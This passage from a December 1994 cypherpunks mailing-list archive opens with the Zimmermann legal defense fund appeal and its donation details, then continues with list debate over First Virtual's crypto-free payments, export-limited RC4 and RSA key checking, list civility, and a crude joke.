Still, while their time has been donated so far, other expenses -- travel, lodging, telephone, and other costs -- have fallen to Phil. If the indictment is handed down, time and costs will soar, and the members of the team currently working pro bono may no longer be able to. Justice does not come cheap in this country, but Phil deserves the best justice money can buy him.

This is where you and I come in. Phil Dubois estimates that the costs of the case, leaving aside the lawyers' fees, will run from US$100,000 - $150,000. If Phil's team must charge for their services, the total cost of the litigation may range as high as US$300,000. The legal defense fund is already several thousand dollars in the red and the airline tickets to San Jose haven't even been purchased yet.

In September, 1993 I wrote a letter urging us all to support Phil, shortly after the first subpoenas were issued by Customs. Today the need is greater than ever, and I'm repeating the call.

Phil has assumed the burden and risk of being the first to develop truly effective tools with which we all might secure our communications against prying eyes, in a political environment increasingly hostile to such an idea -- an environment in which Clipper chips and digital telephony bills are our own government's answer to our concerns. Now is the time for us all to step forward and help shoulder that burden with him.

It is time more than ever. I call on all of us, both here in the US and abroad, to help defend Phil and perhaps establish a groundbreaking legal precedent. PGP now has an installed base of hundreds of thousands of users. PGP works. It must -- no other "crypto" package, of the hundreds available on the Internet and BBS's worldwide, has ever been subjected to the governmental attention PGP has. How much is PGP worth to you? How much is the complete security of your thoughts, writings, ideas, communications, your life's work, worth to you? The price of a retail application package? Send it. More?
Send it. Whatever you can spare: send it.

A legal trust fund, the Philip Zimmermann Defense Fund (PZDF), has been established with Phil Dubois in Boulder. Donations will be accepted in any reliable form, check, money order, or wire transfer, and in any currency, as well as by credit card.

You may give anonymously or not, but PLEASE - give generously. If you admire PGP, what it was intended to do and the ideals which animated its creation, express your support with a contribution to this fund.

* * *

Here are the details:

To send a check or money order by mail, make it payable, NOT to Phil Zimmermann, but to "Philip L. Dubois, Attorney Trust Account." Mail the check or money order to the following address:

    Philip Dubois
    2305 Broadway
    Boulder, CO USA 80304
    (Phone #: 303-444-3885)

To send a wire transfer, your bank will need the following information:

    Bank: VectraBank
    Routing #: 107004365
    Account #: 0113830
    Account Name: "Philip L. Dubois, Attorney Trust Account"

Now here's the neat bit. You can make a donation to the PZDF by Internet mail on your VISA or MasterCard. Worried about snoopers intercepting your e-mail? Don't worry -- use PGP.

Simply compose a message in plain ASCII text giving the following: the recipient ("Philip L. Dubois, Attorney Trust Account"); the bank name of your VISA or MasterCard; the name which appears on it; a telephone number at which you can be reached in case of problems; the card number; date of expiry; and, most important, the amount you wish to donate. (Make this last item as large as possible.) Then use PGP to encrypt and ASCII-armor the message using Phil Dubois's public key, enclosed below. (You can also sign the message if you like.) E-mail the output file to Phil Dubois (dubois at csn.org). Please be sure to use a "Subject:" line reading something like "Phil Zimmermann Defense Fund" so he'll know to decrypt it right away.

Bona fides: My relation to Phil Z.
is that of a long-time user and advocate of PGP and a personal friend. For over a year I moderated the (no longer published) digest, Info-PGP, on the old lucpul.it.luc.edu site here at Loyola. I am in no way involved with the administration of the PZDF. I volunteer my time on its behalf. Phil Dubois is Phil Z.'s lawyer and lead counsel in the Customs case. He administers the PZDF.

To obtain a copy of my public key (with which you can verify the signature on this doc), you have a number of options:

  - Use the copy which I will append below.
  - Send mail to me at hmiller at luc.edu with the "Subject:" line reading "send pubkey"
  - Get it by anon ftp at ftp://ftp.math.luc.edu/pub/hmiller/pubkey.hm
  - Obtain it from an Internet PGP keyserver machine such as pgp-public-keys at pgp.ai.mit.edu. Just send a mail message to this address with the "Subject:" field "GET hmiller".

Other keyserver machines on the Net which accept the same message format (and automatically synchronize keyrings with each other every 10 minutes or so) include:

    pgp-public-keys at pgp.mit.edu
    pgp-public-keys at demon.co.uk
    pgp-public-keys at pgp.ox.ac.uk
    pgp-public-keys at ext221.sra.co.jp
    pgp-public-keys at kub.nl
    pgp-public-keys at pgp.iastate.edu
    pgp-public-keys at dsi.unimi.it
    pgp-public-keys at pgp.dhp.com

You can verify my public key by calling me at 312-338-2689 (home) or 312-508-2727 (office) and letting me read you my key fingerprint ("pgp -kvc hmiller" after you have put my key on your pubring.pgp keyring). I include it also in my .sig, below, if that's good enough for you. You might also note that Phil Zimmermann has signed my public key. Hopefully he is Node #1 in your Web-of-Trust! His key is available on the net keyservers and in the 'keys.asc' file in the PGP distribution packages.

Phil Dubois's pubkey can also be obtained from the keyservers, if you prefer that source to the text below, and from 'keys.asc'. Phil Z. has signed his key as well.
Here is Phil Dubois's public key: Here is my (Hugh Miller's) public key: * * * This campaign letter will be posted in a number of Usenet groups. I will also be turning it into a FAQ-formatted document, which will be posted monthly in the relevant groups and which will be available by anonymous ftp from ftp://ftp.math.luc.edu/pub/hmiller/PGP/pzdf.FAQ. If you come upon, or up with, any other ways in which we can help raise funds for Phil, drop me a line at hmiller at luc.edu and let me know, so that I can put it in the FAQ. 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvFO3tEdYC5Hk8UpAQF6IwQAp3Ig71gGRj/dDGXDBdqj55uMQQsywhi2 pEzh0arfrRonqMX0UleysqYqjcUtm0rvbrXoYUy8a9vJzj4Wuyf1dQ6WyqBkcmOX z7RGtoLVxsfTjNNTrY0810SXx/yOMYtBW7mq+zNmqEykGFZTdfsVKFEyFw6AJ//B Ah+LQNb01Xo= =aW2m -----END PGP SIGNATURE----- -- Hugh Miller, Ph.D. Voice: 312-508-2727 Asst. Professor of Philosophy FAX: 312-508-2292 Loyola University Chicago Home: 312-338-2689 6525 N. Sheridan Rd. E-mail: hmiller at luc.edu Chicago, IL 60626 WWW: http://www.luc.edu/~hmiller PGP Public Key 4793C529: FC D2 08 BB 0C 6D CB C8 0B F9 BA 55 62 19 40 21 From nsb at nsb.fv.com Sat Dec 17 06:33:13 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 17 Dec 94 06:33:13 PST Subject: properties of FV In-Reply-To: <17932.787530924.1@nsb.fv.com> Message-ID: Excerpts from fv: 15-Dec-94 Re: properties of FV Eric Hughes at remailer.net (3122) > > Use > > the crypto entirely for transit security. If someone hacks your > > machine and grabs your passphrase and forges a transaction, at least > > the intruder has to grab your passphrase. > This is exactly the way we would expect to use crypto layered on top of > First Virtual's protocols, if and when such cryptographic protocols are > deployed widely enough to have penetrated a meaningful portion of our > market. > "If and When" is Yes and Today. Anybody who can autosign their > outgoing mail can participate in this kind of transaction already. > Assuming the above agreement is made with respect to private keys, > there is _no_ risk to the customer about loss of secret keys, and no > greater risk to the merchant than what currently obtains. The risk analysis is absolutely true. However, I have the impression you missed the phrase "deployed widely enough to have penetrated a meaningful portion of our market". I suspect that the cypherbunks and www-buyinfo communities are not the best place to get a feel for the extent to which crypto is widely deployed. 
Pick some random other list or newsgroup, however, and I'll be surprised if you find 1% market penetration for crypto. From nsb at nsb.fv.com Sat Dec 17 06:45:52 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 17 Dec 94 06:45:52 PST Subject: FV & PGP (was Re: First Virtual email security) Message-ID: <199412171450.JAA28435@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- Excerpts from fv: 16-Dec-94 Re: FV & PGP (was Re: First.. Mike Ellsworth at firewall. (1283*) > >Without cryptography how exactly are you going to protect my credit card > >numbers from sniffer-snoopers and crackers? Either you will send the > >credit card text in the clear, or it will be encrypted somehow. Or perhaps > >you will have customers call you over the phone to give you their credit > >card info? > I would also like to be convinced on this point. It seems that it's an > either/or. Either the info is in the clear, and thus vulnerable, or it's > encrypted, and safer. Once more, with feeling: It is NOT an either/or. In the First Virtual system, the credit card number NEVER GOES OVER THE NET AT ALL, which means that it doesn't go over the net in the clear AND it doesn't go over the net encrypted. Please check out info at fv.com or URL http://www.fv.com for more information. -- Nathaniel - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvL6qyoZzwIn1bdtAQHSsgGAnwFwtMriI+Ln2qOBGGj6qaOW8e9hdodB fR+SE5cjajZxS4n3QVS5gbI6R6KZkqu5 =KQOY -----END PGP SIGNATURE----- From ddt at lsd.com Sat Dec 17 07:41:04 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 17 Dec 94 07:41:04 PST Subject: MACPGP: developers? Message-ID: Could the folks currently working on the (new?) MacPGP implementation (any version, any country) please identify themselves to me in private email? 
I have some brief questions, and have not been able to raise Zig (nor do I want to bother Phil). Thanks! dave -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAitfCt4AAAEEANk+zWV0Z1tnxsJm25BAvH2NI68RbNOaumDofJgVUL9BePQI HNNbOdu4gAmhcEXMvFVwu3vju4nh9qnzz7lYpw5Yh6TcgVI+vb9OsljfAR+ibhDN j5ParKfwZ+mexOCAfrgdt1z71XLY588qxs70ha6u76dvxUsdw6HBOF9KrwDlAAUT tB1EYXZpZCBEZWwgVG9ydG8gPGRkdEBsc2QuY29tPg== =U20R -----END PGP PUBLIC KEY BLOCK----- From perry at imsi.com Sat Dec 17 08:26:40 1994 From: perry at imsi.com (Perry E. Metzger) Date: Sat, 17 Dec 94 08:26:40 PST Subject: McCoy is Right! New Mail Format to Start Now. In-Reply-To: Message-ID: <9412171626.AA03764@snark.imsi.com> Alan Bostick says: > SLIP connections, quality > Web browsers, and MIME-compliant email packages are the high end of Net > access today. Hardly. I was at a party last friday night where the host had a T1 into his home, and numerous workstations on the home network. That counts as "high end", I'd say. Running a router, firewall and a network of workstations does indeed require skill. However... > They demand either an investment of money (intelligently > spent) or an investment of effort to get the stuff up and running and to > get the know-how needed to do so. Given that you can get a SLIP account just as easily as a shell account (i.e. call a provider) and that terminal software is not notably simpler to configure than SLIP or PPP software (anyone who thinks otherwise should try explaining what "seven bits, even parity" or "vt100 emulation" means to a liberal arts major) I'd say that the arguments being made are specious. They are based on the conjectures of people who haven't tried, rather than on the experience of those who have. 
With a package like "Chameleon", getting a PPP connection going is a matter of typing in a phone number and a couple of other magic values to a pretty friendly on-screen form -- which is more or less the level of effort needed to get a terminal emulator up and running. It might be different effort -- and certain people like Tim who are set in their ways might think of the tiny difference as a huge barrier -- but it's not a particularly large effort. As for the money, these programs are not notably more expensive than commercial terminal emulators. I'd say, in fact, that running via SLIP or PPP is a SMALLER investment in time and effort because for the naive user running native applications on their machine with the native help and windowing systems running is probably a much more comfortable situation than trying to run "elm" via a weird terminal emulator program. And yes, I've some experience at what the naive users are like. There are now boxes you can get from your local bookstore that contain everything you need -- software, online signup, etc -- to get a PPP or SLIP connection to the net. I'd say that the kvetching is all just plain wrong. Perry From perry at imsi.com Sat Dec 17 08:34:48 1994 From: perry at imsi.com (Perry E. Metzger) Date: Sat, 17 Dec 94 08:34:48 PST Subject: FV & PGP (was Re: First Virtual email security) In-Reply-To: <199412170212.VAA21903@bb.hks.net> Message-ID: <9412171634.AA03784@snark.imsi.com> Mike Ellsworth says: > James D. Wilson said: > >Without cryptography how exactly are you going to protect my credit card > >numbers from sniffer-snoopers and crackers? Either you will send the > >credit card text in the clear, or it will be encrypted somehow. Or perhaps > >you will have customers call you over the phone to give you their credit > >card info? > > I would also like to be convinced on this point. It seems that it's an > either/or. Either the info is in the clear, and thus vulnerable, or it's > encrypted, and safer. 
I'm not the biggest fan on earth of the way First Virtual is running things, but you could have the decency to read what they've said before making assumptions. The answer is simple -- they never put the credit card number over the wire at all, either encrypted or unencrypted. Go off and read their documents if you want to know how that works. Perry From hfinney at shell.portal.com Sat Dec 17 08:43:46 1994 From: hfinney at shell.portal.com (Hal) Date: Sat, 17 Dec 94 08:43:46 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412161933.LAA09366@largo.remailer.net> Message-ID: <199412171643.IAA29300@jobe.shell.portal.com> It is an interesting idea that the RSA actually helps with the RC4 decryption by letting them check a key guess. This would suggest, though, that RC4 alone would not be allowed, only RC4 plus RSA. If they allowed RC4 alone then unlimited-length RSA would not seem any worse since with RC4 alone you don't get the key-checking feature. Also, are there restrictions on the encryption exponent? A 1024 bit RSA with a small encryption exponent would be faster to check than a 512 bit RSA with an arbitrary 512 bit encryption exponent. So if this were the reason you might think they would put some restrictions on that. Hal From ddt at lsd.com Sat Dec 17 08:49:28 1994 From: ddt at lsd.com (Dave Del Torto) Date: Sat, 17 Dec 94 08:49:28 PST Subject: LIST: calmness Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Let me be brief so you can hit the "d" key quickly... :) Please don't go, Tim. You are a very valuable asset. Lurk if you must... Everybody: _please_ tone down the "language," and focus, focus, focus. Let's all try to be more diplomatic. There's value in diplomacy. Let's continue to discuss Netscape, but NICELY. They deserve some respect. Enough MIME stuff for now! MIME is nifty, but this is about Crypto. Reset brain to a low-emotion state, post calmly. Let it stew before sending. Keep this list alive, tend it like a garden. It's important. 
dave -----BEGIN PGP SIGNATURE----- Version: 2.6ui iQCVAgUBLvMNc6HBOF9KrwDlAQH7CgP+JQb/T7KG/pJdtAhS9XCYYQGLCiY3Ub0O hSudj0ji5TzwgACWJSMWJv+wmEFzoYIPlEEs3DJjC4LbSV4wz5lGN/3NDCUFc5iH 48wOArC3fTCKkdNJbCsczaDrl5+hdyY5zIwM+4YKF3SEdN0RDtWLiWQaQ56shN6j Kmw9TwBzbS4= =SanU -----END PGP SIGNATURE----- From jcorgan at netcom.com Sat Dec 17 09:21:05 1994 From: jcorgan at netcom.com (jcorgan at netcom.com) Date: Sat, 17 Dec 94 09:21:05 PST Subject: Decrypting PGP 1.0 files Message-ID: <199412171720.JAA00356@mail.netcom.com> -----BEGIN PGP SIGNED MESSAGE----- I have recently uncovered some old conventionally encrypted files from back in '91, using PGP 1.0. I remember the passphrase; however, they won't decrypt and state that the passphrase is bad (this is using PGP 2.6.2.) It occurred to me that PGP used some different algorithm (Bass-O-Matic?) back then, and I don't think the current versions are backwardly compatible (but perhaps they should detect and warn the user that this is the case.) So, where could I get PGP 1.0? 
======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvMdrk1Diok8GKihAQGG0AQAoSGnMZP8kwPlBEfAuvPy0HKC2eXCOW2S RMCV8o9RBD2a7vH5BHVt0f4XWiAUyZ0aEpr+DF7/OCy7KaqFf+5GYZdD0TX8eeHN Zw2NcMF6SztjqQ85b0BshyEfXaOBiEjqszSpMCQ1V5FbEuETYhiTm94uJLChFjCx e7I5Zwklmq0= =Ipmy -----END PGP SIGNATURE----- From eric at remailer.net Sat Dec 17 10:27:10 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 17 Dec 94 10:27:10 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412171643.IAA29300@jobe.shell.portal.com> Message-ID: <199412171924.LAA10824@largo.remailer.net> From: Hal This would suggest, though, that RC4 alone would not be allowed, only RC4 plus RSA. Or perhaps RC4 at 32 bits. All these restrictions are key length dependent. If you have a smaller search space, you can spend more time examining candidates. Also, are there restrictions on the encryption exponent? A 1024 bit RSA with a small encryption exponent would be faster to check than a 512 bit RSA with an arbitrary 512 bit encryption exponent. These are public key operations, remember. The public exponents are usually only a few bits long anyway, no matter what the modulus. Eric From jcorgan at netcom.com Sat Dec 17 10:45:07 1994 From: jcorgan at netcom.com (Johnathan Corgan) Date: Sat, 17 Dec 94 10:45:07 PST Subject: Decrypting PGP 1.0 files Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >So, where could I get PGP 1.0? 
Thanks to those who responded, I found it at: ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp/1.0/pgp10.zip ======================================================================= Johnathan Corgan "Violence is the last refuge of the incompetent" jcorgan at netcom.com -Isaac Asimov PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan ======================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvMxNU1Diok8GKihAQFqAgQA1DEnHuoHYJ82D4qBpVfnnc4IqWawV1sF gS8UmEqqTy3cKZxdzHCbSIQfDGjPxUzakkCqEnOqQYP/3UGj+25cQ4lbqoJLg/Qr N71nEivQ59CyAiUOxkJgO3WVUvYXs4J99EghKNdvIP3tFbKpoeciN15UNWAuedkN 8sPSMweHS7I= =tQOB -----END PGP SIGNATURE----- From eric at remailer.net Sat Dec 17 10:48:28 1994 From: eric at remailer.net (Eric Hughes) Date: Sat, 17 Dec 94 10:48:28 PST Subject: properties of FV In-Reply-To: Message-ID: <199412171945.LAA10849@largo.remailer.net> From: Nathaniel Borenstein > "If and When" is Yes and Today. Anybody who can autosign their > outgoing mail can participate in this kind of transaction already. However, I have the impression you missed the phrase "deployed widely enough to have penetrated a meaningful portion of our market". The argument I see here is like this: "Not very many people have it, so we can't use it." Under this rule, FV shouldn't worry about support for smart front ends, because most people don't have them already. FV shouldn't try to deploy merchant software, because most people don't have it already. Now I know that you're not claiming any of these ridiculous things, that is, outside of cryptography. What I am suggesting is that FV _allow_, not require, the use of encryption. Your main concern with cryptography, it seemed, was theft of secret keys. As you agree, that concern can be disposed of. Now the reason not to use crypto rests on paucity of existing sites which use it. 
If FV were to _require_ crypto, there would be grounds for concern. Yet neither of us think that a crypto requirement is appropriate for the current FV mechanism. So why, then, will not FV lead for crypto rather than follow? It must not be the software integration. PGP-encrypted mail can be recognized by a regular expression and filtered if you want to preserve a single address, or even easier make another address. Raph Levien's premail will automatically encrypt mail for outgoing users, transparently. It must not be the licensing. Perfectly legal PGP can be had from Viacrypt, even for server applications as FV would need. It must not be for marketing. Offering merchants a system where the customers can undertake an effort to lower the merchants' fraud rates seems like nothing but a win. It might be for saving face. Having argued against crypto so publicly, changing positions so rapidly might be seen to look bad. So, I'm confused. What _is_ still the problem? Eric From cwalton at earthlink.net Sat Dec 17 11:07:14 1994 From: cwalton at earthlink.net (Conrad Walton) Date: Sat, 17 Dec 94 11:07:14 PST Subject: Religous Repression Message-ID: A while ago, I too was flamed on this list. PMO (pissed me off). I'm relatively new, having only been here a year and was afraid to post at first. After getting flamed by the likes of perry, lucky and the 'old gang', I too unsubscribed for a while. TCMAY was the one of the few with a voice of reason and rationality in the midst of the immature fire storm. You can tell there's too many college pukes on this list. Seems like anyone who dares to disagree with the "cpunkly correct" religion around here gets flamed. For all the talk about "freedom", "privacy", and "personal choice", there is zero tolerance for difference of opinion on this list. I'm tired of this religious repression here. If you don't agree with the status quo, then you'll be flamed forever. (Maybe that's what the bible means by the Lake of Fire.....) 
I still subscribe, but I sure delete a lot of notes before reading them. You can be sure I will be doing that to the flame I expect back from this note. I was gonna write this a while back and figured it would do no good. It still won't, but I'll feel better. Tim wrote a note recently about civility and I was encouraged. Now, I'm just pissed. This doesn't apply to everyone, but screw all you intolerant, narrow minded bigots. There. I feel better now. ***************************************** Conrad Walton cwalton at earthlink.net ***************************************** Without JOY there can be no STRENGTH. Without STRENGTH, all other VIRTUES are worthless. Edward Abbey From asgaard at sos.sll.se Sat Dec 17 11:53:43 1994 From: asgaard at sos.sll.se (Mats Bergstrom) Date: Sat, 17 Dec 94 11:53:43 PST Subject: Tim May the Luddite--His Last Message for A While In-Reply-To: <922.pfarrell@netcom.com> Message-ID: Pat Farrell wrote: > Cypherpunks will continue. I'm not so sure about the cypherpunks list. Without T.C. May, I'm not so sure either, unless somebody else could take up his role as unofficial moderator. In the past, whenever the list has gone astray, T.C.'s analytical posts have set things straight, calmed down flamers and defined the relevance of various topics (to the cp agenda). This kind of moderation, mostly set by example without annoying hardly anyone, is not so easy to do. Completely unmoderated (in this sense), the cp-list might become just another sci.crypt, talk.politics.crypto or alt.security.pgp. And without the visionary posts by T.C. May, the cp-list would be a lot poorer. Certainly, there are other frequent posters with visions, but T.C. May's long and deep penetration into the consequences of true anonymity or pseudonymity has yet to be equalled on the list. (Other verbal and experienced cp's, like Eric H., Perry M. and Hal F., among others, of course have their own sectors of expertise, no less vital or important.) 
Appendix: The recent boom in signed posts to the cp-list is uninteresting to me. If an argument is good I don't care if the pseudonymous identity (or true, in the sense of a physical identity matching the name in a fingerprint file or whatever) is forged. I would care if an impostor tried to give out disinformation in the name of, for example, Eric H. But I'm sure I would notice the difference. Amanda W.'s latest example of what MIME could be used for was interesting. The only thing that came through to me (Pine 3.91 on a Unix shell account over Ethernet to a Reflection for Windows client) was an underscored 'on' in red pixels. What a wonderful instrument for SHOUTING. Mats From anonymous-remailer at shell.portal.com Sat Dec 17 12:15:01 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Sat, 17 Dec 94 12:15:01 PST Subject: HUMOR: The Train Message-ID: <199412172014.MAA10944@jobe.shell.portal.com> The Train Author Unknown A few days after Christmas a mother was working in the kitchen, listening to her son playing with his new electric train in the living room. She heard the train stop and her son said, "All you sons of bitches who want off, get the hell off now 'cause this is the last stop. And all you sons of bitches who are getting on, get your asses in the train 'cause we're leaving." The mother went in and told her son, "We don't use that kind of language in this house. Now, I want you to go to your room for two hours. When you come out, you may play with your train, but I want you to use nice language." Two hours later, the son comes out of the bedroom and resumes playing with his train. Soon the train stopped and the mother heard her son say, "All passengers who are disembarking the train, please remember to take all your belongings with you. We thank you for riding with us today and hope your trip was a pleasant one. We hope you will ride with us again soon." 
"For those of you just boarding, we ask you to stow all of your hand luggage under the seat. Remember there is no smoking except in the club car. We hope you will have a pleasant and relaxing journey with us today." "For those of you who are pissed off about the two hour delay, please see the bitch in the kitchen." From nsb at nsb.fv.com Sat Dec 17 12:57:17 1994 From: nsb at nsb.fv.com (Nathaniel Borenstein) Date: Sat, 17 Dec 94 12:57:17 PST Subject: properties of FV In-Reply-To: <21153.787690580.1@nsb.fv.com> Message-ID: Excerpts from fv: 17-Dec-94 Re: properties of FV eric at remailer.net (2015) > The argument I see here is like this: "Not very many people have it, > so we can't use it." Under this rule, FV shouldn't worry about > support for smart front ends, because most people don't have them > already. FV shouldn't try to deploy mechant software, because most > people don't have it already. Now I know that you're not claiming any > of these ridiculous things, that is, outside of cryptography. Interesting analogy. But there's a number of other tradeoffs here. The work involved for us in the case of a smart front end is relatively minimal -- whipping together a safe-tcl-based front end for metamail-enabled mail tools didn't take me very long at all, actually, and it makes for very sexy demos, which as you know is important to marketing types. (Ever tried giving a sexy demo of cryptography? It's sort of like demoing a new kernel. Ooh, how exciting.) So while I am certainly NOT claiming that sexy demos are more important than cryptographic freedom, it is simply true that there was a far larger perceived "bang for the buck" in building the sexy front end. And as for deploying merchant software, well, that IS clearly more essential than cryptography -- you simply can't have a commerce mechanism without sellers! The work involved in adding optional cryptography is much more than you might think, particularly because of our internal security architecture. 
Basically, without going into a lot of details, the FV crypto-engine would have to live on the non-Internet machines that are not in our direct control, and this would enormously complicate the limited (batch!) communication we facilitate between the Internet and non-Internet machines. Trust me, it isn't trivial by a long shot. That doesn't mean we won't do it, but it does affect our priorities. (It's interesting that in our case, security gets in the WAY of crypto, given the non-cryptographic security mechanisms we've already set up!) > What I am suggesting is that FV _allow_, not require, the use of > encryption. Your main concern with cryptography, it seemed, was theft > of secret keys. As you agree, that concern can be disposed of. Now > the reason not to use crypto rests on paucity of existing sites which > use it. If FV were to _require_ crypto, there would be grounds for > concern. Yet neither of us think that a crypto requirement is > appropriate for the current FV mechanism. I think we're completely in sync here with regard to everything except the timing: we're a small company and we have to choose our priorities carefully. The crypto option is one we're very interested in adding eventually, but at this point it would be a major strain on our resources. Moreover, frankly, if we did it, that would only serve to mix our message in many people's perception. It's hard enough explaining to reporters that "we've discovered that crypto isn't needed for commerce." Their chance of understanding our message would NOT be enhanced if we then added "but we're providing crypto as an option anyway." At this early stage, we have to keep our publicity message as simple as possible. (In fact, I think it's already too complicated, so making it even more complicated is a very hard sell.) > So why, then, will not FV lead for crypto rather than follow? Well, mostly because we're leading for commerce, and we can't lead for everything. 
Trying to do too many things at once often causes you not to succeed at any of them. We do, however, put our money where our mouth is when we say that we believe in the importance of universal access to cryptography -- that's why, even as a startup, we are a significant sponsor of Phil Zimmermann's ongoing work. (We paid for the development of a PGP-encrypted telnet, which will be publicly available soon if it isn't already, and we send monthly checks in support of work related to the development of PGP 3.0.) I think I could argue that this makes us more of a "leader for crypto" than most other companies in the world. We just don't want our belief in the importance of privacy, which is real, to become an obstacle to the success of our business plan, which does not require cryptography, and which in fact REQUIRES making people realize that crypto is not a prerequisite for commerce. > It might be for saving face. Having argued against crypto so > publicly, changing positions so rapidly might be seen to look bad. Heck, no. I will *enjoy* the day when we add cryptographic support, and as I hope I've made clear above, I won't regard this as "changing positions" at all. To be perfectly clear, our position is that crypto would be a valuable future enhancement to our system because it will enhance our users' privacy, not because it will enhance the system's security. We think the system is quite sufficiently secure today, without crypto. I am sorry if we have alienated some crypto-enthusiasts with our "crypto is not needed" argument, but this fact is critical to our business strategy. It is NOT the same as saying "crypto is bad". So if we've been unclear, let me try once more to be crystal clear: 1. Cryptography is a Good Thing. 2. Universal access to cryptography is critical to the future of human freedom. 3. 
First Virtual has discovered that cryptography is not NECESSARY for Internet commerce, and is trying to use that discovery to stimulate real commerce on the net and to grow our business. 4. Nearly every technology has positive and negative effects. If our discovery sets back the progress of freedom of cryptography, that was never our intent, and we recognize it as a NEGATIVE effect. Just because crypto isn't necessary for commerce doesn't mean it isn't vitally important to the future of humanity. 5. As a socially responsible corporate citizen of the net, recognizing the special responsibilities that stem from our invention of crypto-free commerce, First Virtual is proud to sponsor ongoing PGP development, and is open to other opportunities (within our still-limited resources) to help promote the cause of free and universal access to cryptography. > So, I'm confused. What _is_ still the problem? Mostly that there's not enough hours in the day. (To give you an idea of how I spend MY time: In the 36 hour period that ended Saturday morning, during which I was briefly out of town, I received 760 email messages. No kidding. We're a tad busy these days....) The bottom line: First Virtual is not the enemy of cryptography. However, our invention is certainly cause for concern for those among us who thought that commerce would be the "killer app" for making cryptography universally available. We believe that on balance our invention is a very good thing, especially given its democratizing properties (anyone in the world can be a merchant, unlike standard credit cards). We want to work WITH the advocates of crypto to make sure that cryptography remains available for privacy, even though we have demonstrated that it isn't necessarily a prerequisite for commerce. 
-- Nathaniel From hfinney at shell.portal.com Sat Dec 17 12:58:30 1994 From: hfinney at shell.portal.com (Hal) Date: Sat, 17 Dec 94 12:58:30 PST Subject: Thoughts on 15 day CJ crypto In-Reply-To: <199412171924.LAA10824@largo.remailer.net> Message-ID: <199412172058.MAA13081@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- eric at remailer.net (Eric Hughes) writes: > From: Hal > Also, are there restrictions on the encryption exponent? A 1024 bit RSA > with a small encryption exponent would be faster to check than a 512 bit > RSA with an arbitrary 512 bit encryption exponent. >These are public key operations, remember. The public exponents are >usually only a few bits long anyway, no matter what the modulus. That's what I mean. "Usually" they are, but that helps a snooper to check his guess. Maybe it would be wise when using limited-length session keys to use larger encryption exponents just to confound an exhaustive search of the session key space. I think it is surprising if there is no limitation on encryption exponent size for these exportable key systems, assuming that is the strategy the government is using. Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLvNQxRnMLJtOy9MBAQHXdAIAmvtcjZUXJF97vROjOFQK1DJ2jx44GhZq CkmETSb8nmkzJhRVDYyQ7aZgWKSOril2MQsTRkJ59DyLKGZY7qQ6oQ== =e06A -----END PGP SIGNATURE----- From jrochkin at cs.oberlin.edu Sat Dec 17 13:26:30 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Sat, 17 Dec 94 13:26:30 PST Subject: properties of FV Message-ID: At 3:55 PM 12/17/94, Nathaniel Borenstein wrote: [...] >Well, mostly because we're leading for commerce, and we can't lead for >everything. Trying to do too many things at once often causes you not >to succeed at any of them. We do, however, put our money where our mouth >is when we say that we believe in the importance of universal access to >cryptography -- that's why, even as a startup, we are a significant >sponsor of Phil Zimmermann's ongoing work. 
(We paid for the development >of a PGP-encrypted telnet, which will be publicly available soon if it >isn't already, and we send monthly checks in support of work related to >the development of PGP 3.0.) [...] >So if we've been unclear, let me try once more to be crystal clear: > >1. Cryptography is a Good Thing. > >2. Universal access to cryptography is critical to the future of human >freedom. Hmm. Does everyone that previously flamed the hell out of First Virtual feel kind of stupid now? Don't get me wrong, I don't have anything wrong with discussing the limitations of First Virtual's protocols or software on the list, that's what the list is for. But it seems kind of counterproductive to be viciously flaming people like First Virtual and Mosaic, especially when both have said that they remain committed to cryptography. Heck, if they hadn't said this, it would probably be even more important not to flame them, cause we'd want to convince them to change their minds. And being rude rarely convinced anyone of anything. I'm just issuing a plea that people try to be a bit less rude on the list in the future, especially with Real Live Commercial Developers. Not that commercial developers are better than the rest of us, but I'm sure we all agree that it would be really nice if commercial software supported strong crypto, and it's really important to get commercial developers to do so. If some of them are listening in on the list, it seems a good opportunity to try to rationally and reasonably explain why crypto is good (if not necessary, as FV claims), and what sorts of crypto are strong enough and well suited for their applications. Without calling them names. From hfinney at shell.portal.com Sat Dec 17 13:50:01 1994 From: hfinney at shell.portal.com (Hal) Date: Sat, 17 Dec 94 13:50:01 PST Subject: Time to exhaustively break 40-bit RC4? 
In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com>
Message-ID: <199412172149.NAA15954@jobe.shell.portal.com>

I notice in the Netscape SSL spec the 40-bit export-approved RC4 key generation is a little more complicated than I would have thought. First a 128 bit "master key" is chosen and 88 bits are revealed, leaving 40 bits secret. Then the RC4 session key is generated as the MD5 hash of this master key plus about 32 bytes of publicly known but random information.

I'm not clear whether the 128-bit output of the MD5 hash is then used as the RC4 key, or whether only 40 bits are used (and if so, whether there are any public bits in the key besides these 40). If the former, then this extra hash step should really slow down exhaustive search of the key space. If the latter, then it is not clear why the master key is key-size restricted at all since it is not likely to be used in searching the key space.

